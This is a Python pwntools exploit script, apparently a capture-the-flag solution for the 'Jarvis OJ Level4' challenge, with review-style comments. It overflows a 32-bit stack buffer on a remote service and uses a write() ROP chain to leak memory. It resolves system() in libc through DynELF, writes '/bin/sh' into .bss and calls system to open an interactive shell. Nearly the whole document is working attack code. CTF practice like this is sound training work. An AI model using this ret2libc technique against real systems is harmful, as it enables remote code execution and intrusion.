Jarvis OJ-Level4
#!/usr/bin/env python
# coding:utf-8
from pwn import *
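# Target binary. Every address below is packed with p32(), so the script
# assumes a 32-bit, non-PIE ELF whose PLT/.bss addresses are fixed.
elf = ELF('level4')

# PLT stubs are callable from the ROP chain before libc's base is known.
# elf.plt is the explicit accessor for them (elf.symbols also maps an
# imported name to its PLT stub in a non-PIE binary, which the original used).
write_plt = p32(elf.plt['write'])
read_plt = p32(elf.plt['read'])

# Return address used after each gadget call: jumping back to _start restarts
# the program so the same overflow can be triggered again without needing a
# pop-ret gadget to clean up the arguments.
start_addr = p32(elf.symbols['_start'])

# Writable scratch area the "/bin/sh" string is read into (start of .bss).
data_addr = p32(elf.symbols['__bss_start'])

# Padding up to the saved return address: presumably 0x88 bytes of locals
# plus 4 bytes of saved EBP (from the challenge's stack layout).
junk = "A" * (0x88 + 4)

Io = remote("pwn2.jarvisoj.com", 9880)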
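def leak(addr):
    """Read and return the 4 raw bytes at ``addr`` in the remote process.

    This is the DynELF leak callback. The ROP chain calls
    ``write(1, addr, 4)`` and then returns to ``_start`` so the program
    restarts and can be overflowed again on the next call.

    Args:
        addr: absolute address to read (int).

    Returns:
        Exactly 4 bytes, as read from ``addr``.

    Note:
        If ``addr`` is not mapped, write() presumably fails and sends
        nothing back, so this call would block; keep that in mind when
        a DynELF lookup appears to hang.
    """
    payload = junk + write_plt + start_addr + p32(1) + p32(addr) + p32(4)
    Io.send(payload)
    # recv(4) can return fewer than 4 bytes on a slow link, which would make
    # u32() fail and feed DynELF garbage; recvn() waits for the full word.
    leaked = Io.recvn(4)
    print("[%s] -> [%s] = [%s]" % (hex(addr), hex(u32(leaked)), repr(leaked)))
    return leaked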
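# Stage 1: resolve system() in the remote libc using only the leak()
# primitive (no local libc copy required). Reuse the ELF object opened above
# instead of parsing the binary a second time.
d = DynELF(leak, elf=elf)
system_addr = d.lookup('system', 'libc')
print("[system()] -> [%s]" % (hex(system_addr)))

# Stage 2: read(0, __bss_start, 8) to place "/bin/sh\0" (exactly 8 bytes)
# in writable memory, then restart via _start.
payload = junk + read_plt + start_addr + p32(0) + data_addr + p32(8)
Io.send(payload)
# NOTE(review): if the vulnerable read() buffer is larger than the ROP
# payload, this second send may be coalesced into the same read() as the
# chain and never reach read(0, bss, 8). A short pause (or waiting for the
# restart banner, if any) before this send would make the sequence robust;
# left as-is because the original relies on the two sends arriving separately.
Io.send("/bin/sh\x00")

# Stage 3: system("/bin/sh"). The 0xFFFFFFFF return address is a dummy;
# we never expect system() to return.
payload = junk + p32(system_addr) + p32(0xFFFFFFFF) + data_addr
Io.send(payload)

Io.interactive()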
